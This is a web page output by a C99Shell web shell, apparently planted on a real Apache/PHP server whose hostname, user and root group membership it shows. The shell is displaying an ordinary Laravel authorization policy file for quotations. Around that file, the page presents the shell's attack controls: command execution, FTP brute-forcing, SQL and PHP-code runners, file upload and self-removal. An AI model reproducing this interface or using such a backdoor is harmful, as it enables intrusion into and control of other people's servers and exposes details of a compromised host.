!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/inventory.picotech.app/public_html/app/Policies/   drwxr-xr-x
Free 28.58 GB of 117.98 GB (24.23%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     QuotationPolicy.php (2.42 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace App\Policies;

use 
App\Models\User;
use 
App\Models\Quotation;
use 
App\Models\Permission;
use 
Illuminate\Auth\Access\HandlesAuthorization;

class 
QuotationPolicy
{
    use 
HandlesAuthorization;

    
/**
     * Determine whether the user can view any models.
     *
     * @param  \App\Models\User  $user
     * @return mixed
     */
    
public function viewAny(User $user)
    {
        
//
    
}

    
/**
     * Determine whether the user can view the model.
     *
     * @param  \App\Models\User  $user
     * @param  \App\Models\Quotation  $quotation
     * @return mixed
     */
    
public function view(User $user)
    {
        
$permission Permission::where('name''Quotations_view')->first();
        return 
$user->hasRole($permission->roles);
    }

    
/**
     * Determine whether the user can create models.
     *
     * @param  \App\Models\User  $user
     * @return mixed
     */
    
public function create(User $user)
    {
        
$permission Permission::where('name''Quotations_add')->first();
        return 
$user->hasRole($permission->roles);
    }

    
/**
     * Determine whether the user can update the model.
     *
     * @param  \App\Models\User  $user
     * @param  \App\Models\Quotation  $quotation
     * @return mixed
     */
    
public function update(User $user)
    {
        
$permission Permission::where('name''Quotations_edit')->first();
        return 
$user->hasRole($permission->roles);
    }

    
/**
     * Determine whether the user can delete the model.
     *
     * @param  \App\Models\User  $user
     * @param  \App\Models\Quotation  $quotation
     * @return mixed
     */
    
public function delete(User $user)
    {
        
$permission Permission::where('name''Quotations_delete')->first();
        return 
$user->hasRole($permission->roles);
    }

    public function 
check_record(User $user$quotation)
    {
        return 
$user->id === $quotation->user_id;
    }


    
/**
     * Determine whether the user can restore the model.
     *
     * @param  \App\Models\User  $user
     * @param  \App\Models\Quotation  $quotation
     * @return mixed
     */
    
public function restore(User $user)
    {
        
//
    
}

    
/**
     * Determine whether the user can permanently delete the model.
     *
     * @param  \App\Models\User  $user
     * @param  \App\Models\Quotation  $quotation
     * @return mixed
     */
    
public function forceDelete(User $user)
    {
        
//
    
}
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--